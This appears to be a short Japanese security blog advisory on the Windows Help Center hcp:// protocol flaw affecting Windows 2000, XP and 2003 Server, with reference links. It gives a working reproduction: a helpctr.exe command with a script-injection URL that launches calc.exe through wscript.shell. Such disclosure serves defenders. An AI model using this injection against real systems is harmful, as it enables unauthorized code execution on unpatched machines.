Windowsヘルプセンターのウェブプロトコル(hcp://)のurlリクエストハンドルのバグがあり、ローカル側のシステム権限を使われてwscript.shell(Windowsスクリプトエンジン)でシステムコマンドを実効する事が出来ますので、ローカル側のセキュリティ問題になります。
本件セキュリティ問題について下記のOSに影響があります↓
Windows 2000,Windows XP
Windows 2003 Server
Windows 2003 Server
再現コードは下記となります↓
C:\> ver
Microsoft Windows XP [Version 5.1.2600]
C:\> c:\windows\pchealth\helpctr\binaries\helpctr.exe -url "hcp://system/sysinfo/sysinfomain.htm?svr=<script
defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>"
C:\>
詳細な説明は暫く下記のurlとなります↓
http://www.kb.cert.org/vuls/id/578319
http://seclists.org/fulldisclosure/2010/Jun/205
http://isc.sans.edu/diary.html?storyid=8953
http://www.theinquirer.net/inquirer/news/1676668/xp-help-center-security-flaw-leaves-machines-wide
http://seclists.org/fulldisclosure/2010/Jun/205
http://isc.sans.edu/diary.html?storyid=8953
http://www.theinquirer.net/inquirer/news/1676668/xp-help-center-security-flaw-leaves-machines-wide
---
zeroday.jpセキュリティチーム
http://0day.jp
0 件のコメント:
コメントを投稿